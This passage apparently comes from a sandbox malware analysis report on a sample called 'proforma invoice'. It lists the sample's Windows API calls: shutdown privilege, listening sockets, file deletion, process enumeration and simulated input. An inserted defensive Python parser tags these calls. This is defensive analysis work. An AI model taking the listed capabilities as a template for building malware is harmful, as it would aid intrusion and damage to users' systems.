                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                  • String ID: $ $@$SeShutdownPrivilege
                  • API String ID: 2234035333-3163812486
                  • Opcode ID: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
                  • Instruction ID: 9a3b8cbe9c187b871ddb6861d80ea139ca88f490fd0d25d1458113d302f2c974
                  • Opcode Fuzzy Hash: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
                  • Instruction Fuzzy Hash: 8D01D673610211AFEB5426B89C8ABBF7ADCE714750F154DA2FD22F31D1DAB19C408294
                  APIs
                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B21276
                  • WSAGetLastError.WSOCK32 ref: 00B21283
                  • bind.WSOCK32(00000000,?,00000010), ref: 00B212BA
                  • WSAGetLastError.WSOCK32 ref: 00B212C5
                  • closesocket.WSOCK32(00000000), ref: 00B212F4
                  • listen.WSOCK32(00000000,00000005), ref: 00B21303
                  • WSAGetLastError.WSOCK32 ref: 00B2130D
                  • closesocket.WSOCK32(00000000), ref: 00B2133C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$closesocket$bindlistensocket
                  • String ID:
                  • API String ID: 540024437-0
                  • Opcode ID: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
                  • Instruction ID: 21f833be267dc91376bd467332b494f493f5dad6ed0095f8e1046d87b4cd52aa
                  • Opcode Fuzzy Hash: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
                  • Instruction Fuzzy Hash: 4C416031A00110EFD710DF68D584B2ABBE6EF56314F288598E85A9F2D6C771ED81CBA1
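Every function summary in this section uses the same layout: an APIs list (direct calls, plus calls the sandbox attributes to a callee as "Part of subcall function"), the memory-dump lines, and a Similarity block with the joined API/String IDs and the opcode and instruction hashes. The Python below is an added example, not Joe Sandbox's own tooling: it parses that layout into records, names the socket() argument triple that the report prints only as raw hex (so 00000002,00000001,00000006 reads as AF_INET/SOCK_STREAM/IPPROTO_TCP), and tags each function by the API chain it contains. The SAMPLE input is constructed from the ExitWindowsEx and socket/bind/listen records above with the Associated lines trimmed; the tag names and rules are our own, not part of the report.

```python
# Added example (not Joe Sandbox code): parse the report's "IDA Plugin" function summaries and
# tag each function by its API chain. The SAMPLE records are copied from the report above.
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed input: the ExitWindowsEx and the socket/bind/listen records above, trimmed.
SAMPLE = """\
APIs
  • Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
  • Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
  • Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A
• ExitWindowsEx.USER32(?,00000000), ref: 00B0E932
• Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• Opcode ID: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
• Instruction Fuzzy Hash: 8D01D673610211AFEB5426B89C8ABBF7ADCE714750F154DA2FD22F31D1DAB19C408294
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B21276
• WSAGetLastError.WSOCK32 ref: 00B21283
• bind.WSOCK32(00000000,?,00000010), ref: 00B212BA
• listen.WSOCK32(00000000,00000005), ref: 00B21303
• closesocket.WSOCK32(00000000), ref: 00B2133C
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• Opcode ID: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
• Instruction Fuzzy Hash: 4C416031A00110EFD710DF68D584B2ABBE6EF56314F288598E85A9F2D6C771ED81CBA1
"""

# One API line: a direct call, or one attributed to a callee ("Part of subcall function").
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<subfn>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
FIELD_RE = re.compile(r"•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # any other "• Key: value"

ApiCall = namedtuple("ApiCall", "name module args ref subcall_of", defaults=("",))

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def strings(self):  # Joe Sandbox joins a function's string references with '$'
        return [s for s in self.fields.get("String ID", "").split("$") if s.strip()]

def parse_records(text):
    """Split report text into FunctionRecords; 'Instruction Fuzzy Hash' closes a record."""
    records, cur = [], FunctionRecord()
    for line in (ln.strip() for ln in text.splitlines()):
        if m := API_RE.match(line):
            args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["subfn"] or ""))
        elif m := FIELD_RE.match(line):
            cur.fields[m["key"]] = m["val"].strip()  # repeated keys (Associated) keep the last
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records

AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "default", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

def decode_socket(call):
    """Name the (af, type, protocol) triple the report prints as hex; None if any is '?'."""
    try:
        af, typ, proto = (int(a, 16) for a in call.args[:3])
    except ValueError:
        return None
    return (AF.get(af, hex(af)), SOCK.get(typ, hex(typ)), PROTO.get(proto, hex(proto)))

# API chains worth a tag when they occur together in one function (our own rules).
RULES = {
    "adjusts-token-privileges": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "shutdown-or-logoff": {"ExitWindowsEx"},
    "bound-socket": {"socket", "bind"},
    "listening-socket": {"socket", "bind", "listen"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW"},
    "recursive-file-delete": {"FindFirstFileW", "FindNextFileW", "DeleteFileW"},
}

def classify(rec):
    """Tag one function; subcall APIs count, since they execute on the same path."""
    names = {c.name for c in rec.apis}
    tags = {tag for tag, needed in RULES.items() if needed <= names}
    for call in rec.apis:
        if call.name == "socket" and (d := decode_socket(call)):
            tags.add(f"socket:{d[1]}/{d[2]}")
    for s in rec.strings:
        if s.startswith("Se") and s.endswith("Privilege"):
            tags.add(f"privilege:{s}")
    return tags

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("Opcode ID", "")[:16], "->", ", ".join(c.name for c in rec.apis))
        print("    tags:", ", ".join(sorted(classify(rec))))
```

Run against the full report text, the Opcode ID and Instruction Fuzzy Hash fields of each record can be carried into a similarity search, while the tags give a first triage of which functions enable SeShutdownPrivilege, open a bound or listening socket, walk the process list, or delete directory trees. Arguments the sandbox could not resolve appear as "?" and are left unresolved rather than guessed.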
                  APIs
                    • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                    • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B0D420
                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B0D470
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0D481
                  • FindClose.KERNEL32(00000000), ref: 00B0D498
                  • FindClose.KERNEL32(00000000), ref: 00B0D4A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                  • String ID: \*.*
                  • API String ID: 2649000838-1173974218
                  • Opcode ID: 1c54e2369a3b65236e74e1044076eb6699350c456bf689c2613148d7b1bc39a9
                  • Instruction ID: 53ecac252129edfabf86fa6edd83254b394f4351e530006b4c74593a9745ccd3
                  • Opcode Fuzzy Hash: 1c54e2369a3b65236e74e1044076eb6699350c456bf689c2613148d7b1bc39a9
                  • Instruction Fuzzy Hash: 48317E310083419BC701EFA4D9919AFBBE8BE96300F444A5DF4D5932D1EB34AA09CB63
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: 3c0ef62c40229cec6cda2a6e83fd7cc4ee237f9d88dc3c264c1f8cbcff205d82
                  • Instruction ID: b534a735dd88f59411d6240c58beb37ee81322cbe11e42393960f5987c94e018
                  • Opcode Fuzzy Hash: 3c0ef62c40229cec6cda2a6e83fd7cc4ee237f9d88dc3c264c1f8cbcff205d82
                  • Instruction Fuzzy Hash: 4DC22771E086288FDB25DF289D407EAB7B5EB49305F1541EBD84EEB240E775AE818F40
                  APIs
                  • _wcslen.LIBCMT ref: 00B164DC
                  • CoInitialize.OLE32(00000000), ref: 00B16639
                  • CoCreateInstance.OLE32(00B3FCF8,00000000,00000001,00B3FB68,?), ref: 00B16650
                  • CoUninitialize.OLE32 ref: 00B168D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                  • String ID: .lnk
                  • API String ID: 886957087-24824748
                  • Opcode ID: 9aec7c1e60d7919d0a7118f99f60af669ac306fe3d264881dfdf1e2c5aa96f44
                  • Instruction ID: 3e8e5443ccd9edc074f6b01ba30964a65be97cff8a39c544244379a615fe1771
                  • Opcode Fuzzy Hash: 9aec7c1e60d7919d0a7118f99f60af669ac306fe3d264881dfdf1e2c5aa96f44
                  • Instruction Fuzzy Hash: D1D15871508301AFC304EF24C981AABB7E9FF99704F54896DF5958B2A1EB30ED45CB92
                  APIs
                  • GetForegroundWindow.USER32(?,?,00000000), ref: 00B222E8
                    • Part of subcall function 00B1E4EC: GetWindowRect.USER32(?,?), ref: 00B1E504
                  • GetDesktopWindow.USER32 ref: 00B22312
                  • GetWindowRect.USER32(00000000), ref: 00B22319
                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B22355
                  • GetCursorPos.USER32(?), ref: 00B22381
                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B223DF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                  • String ID:
                  • API String ID: 2387181109-0
                  • Opcode ID: 108257b0b4d56ae64f5c13afb2fafecefb8aed1ac786c6b93678fc190dbcd170
                  • Instruction ID: 33e90903394f0d318b6f22e5f53192137567a4c4b400ae2db0a29eed6bbe0535
                  • Opcode Fuzzy Hash: 108257b0b4d56ae64f5c13afb2fafecefb8aed1ac786c6b93678fc190dbcd170
                  • Instruction Fuzzy Hash: 9E31FE72504315AFCB20DF54D849B9BBBE9FF88310F100A59F998E7181DB34EA08CB96
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B19B78
                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B19C8B
                    • Part of subcall function 00B13874: GetInputState.USER32 ref: 00B138CB
                    • Part of subcall function 00B13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B13966
                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B19BA8
                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B19C75
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                  • String ID: *.*
                  • API String ID: 1972594611-438819550
                  • Opcode ID: 909ef9b64c076795ad1fb60ea9c3b31f56d299d5b0d86afd80a0e1c382eb2fba
                  • Instruction ID: 041b9fca0189571445e2e61af249377ede8bf373f61f04d3da2f8f1a804c0ba8
                  • Opcode Fuzzy Hash: 909ef9b64c076795ad1fb60ea9c3b31f56d299d5b0d86afd80a0e1c382eb2fba
                  • Instruction Fuzzy Hash: C341817190424AAFCF55DFA4C995AEEBBF8EF05310F644095F845A3291EB309E84CFA0
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AB9A4E
                  • GetSysColor.USER32(0000000F), ref: 00AB9B23
                  • SetBkColor.GDI32(?,00000000), ref: 00AB9B36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$LongProcWindow
                  • String ID:
                  • API String ID: 3131106179-0
                  • Opcode ID: 65b76b4a7695bee474751d19e07343786ed35720c412dc14a00f7e9862a42864
                  • Instruction ID: b7245334d9f91cbc874a39879475187470abb355df4f274b72c88254a1e6188b
                  • Opcode Fuzzy Hash: 65b76b4a7695bee474751d19e07343786ed35720c412dc14a00f7e9862a42864
                  • Instruction Fuzzy Hash: E0A10770118548AEE728AB7C8C99EFF3AADDF42380F25410DF712D6693CE259D42D272
                  APIs
                    • Part of subcall function 00B2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                    • Part of subcall function 00B2304E: _wcslen.LIBCMT ref: 00B2309B
                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B2185D
                  • WSAGetLastError.WSOCK32 ref: 00B21884
                  • bind.WSOCK32(00000000,?,00000010), ref: 00B218DB
                  • WSAGetLastError.WSOCK32 ref: 00B218E6
                  • closesocket.WSOCK32(00000000), ref: 00B21915
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                  • String ID:
                  • API String ID: 1601658205-0
                  • Opcode ID: dec17524cdf23630132ecf874c8b4828046c50325dd870d273860041ac80fab0
                  • Instruction ID: 4230128f1b48b1f44997ff55e7442b36e42af7a47653bfba389ba881e0f2ce9e
                  • Opcode Fuzzy Hash: dec17524cdf23630132ecf874c8b4828046c50325dd870d273860041ac80fab0
                  • Instruction Fuzzy Hash: 8651B471A00210AFEB10AF24D9C6F6A77E5EB45718F188498F90A6F3D3D771ED418BA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                  • String ID:
                  • API String ID: 292994002-0
                  • Opcode ID: 3c0129d31e757b12e474bbf73ad7bc1b02b034db9dabd190f8b42674949a2ea2
                  • Instruction ID: a0a26260ebd0e644f76573c787c316efaf8392e114f7788c5bd23f7a4622a5c2
                  • Opcode Fuzzy Hash: 3c0129d31e757b12e474bbf73ad7bc1b02b034db9dabd190f8b42674949a2ea2
                  • Instruction Fuzzy Hash: AF21A3317402105FD7208F2ED894B6A7BE9EF95325F7994A8E8469F351CB71EC42CB90
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                  • API String ID: 0-1546025612
                  • Opcode ID: da6ab05918eb5edcc9ab89880b525e1dc93b90efbc01f1663b0c7e1e2cdf489d
                  • Instruction ID: 5e5bcb3476b5e652d875b478a33f857004c48d4df0097972f13f0a8553ae801c
                  • Opcode Fuzzy Hash: da6ab05918eb5edcc9ab89880b525e1dc93b90efbc01f1663b0c7e1e2cdf489d
                  • Instruction Fuzzy Hash: C1A2A070E0065ACBDF24CF59C9807EEB7B1BF55314F2485AAE815AB285EB349D81CF90
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00B2A6AC
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00B2A6BA
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • Process32NextW.KERNEL32(00000000,?), ref: 00B2A79C
                  • CloseHandle.KERNEL32(00000000), ref: 00B2A7AB
                    • Part of subcall function 00ABCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AE3303,?), ref: 00ABCE8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                  • String ID:
                  • API String ID: 1991900642-0
                  • Opcode ID: dab0ddc47f79087fdd5d40da5be9379acfb1a5182c461065ebdd344cff2117b1
                  • Instruction ID: 3a9b4f638c8fada9f0cb94131199d44bebe0cb2693496e186920441aef4e7b25
                  • Opcode Fuzzy Hash: dab0ddc47f79087fdd5d40da5be9379acfb1a5182c461065ebdd344cff2117b1
                  • Instruction Fuzzy Hash: 59514C71508310AFD710EF24D986E6BBBE8FF89754F00895DF59997292EB30D904CB92
                  APIs
                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B0AAAC
                  • SetKeyboardState.USER32(00000080), ref: 00B0AAC8
                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B0AB36
                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B0AB88
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: KeyboardState$InputMessagePostSend
                  • String ID:
                  • API String ID: 432972143-0
                  • Opcode ID: 09ffb8080a511815850543bc3c08538fd7115645043d84c36b2c886d854179cf
                  • Instruction ID: 7e6cc47a851bda0a7eed12a27dee2d2ae4f69bc022c5306c75770af0c5275e0e
                  • Opcode Fuzzy Hash: 09ffb8080a511815850543bc3c08538fd7115645043d84c36b2c886d854179cf
                  • Instruction Fuzzy Hash: 2C311431A40308AEFB359B68CC45BFA7FE6EB44310F144A9AF581A61E1D774C985C762
                  APIs
                  • _free.LIBCMT ref: 00ADBB7F
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • GetTimeZoneInformation.KERNEL32 ref: 00ADBB91
                  • WideCharToMultiByte.KERNEL32(00000000,?,00B7121C,000000FF,?,0000003F,?,?), ref: 00ADBC09
                  • WideCharToMultiByte.KERNEL32(00000000,?,00B71270,000000FF,?,0000003F,?,?,?,00B7121C,000000FF,?,0000003F,?,?), ref: 00ADBC36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                  • String ID:
                  • API String ID: 806657224-0
                  • Opcode ID: 4795ad65227814affda4c45ccd2c3605436e5ce6ef9b82d496676c9e05d3b52c
                  • Instruction ID: e8ce2e954c8088f670ffe09f7cde72c668d8c3003e97fb278a86afc4b1ce860d
                  • Opcode Fuzzy Hash: 4795ad65227814affda4c45ccd2c3605436e5ce6ef9b82d496676c9e05d3b52c
                  • Instruction Fuzzy Hash: 5D318D71914205DFCB11DF6D8C81969BBB8BF45350B154AABE06AEB3A2DB309940DB70
                  APIs
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00B1CE89
                  • GetLastError.KERNEL32(?,00000000), ref: 00B1CEEA
                  • SetEvent.KERNEL32(?,?,00000000), ref: 00B1CEFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                   • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
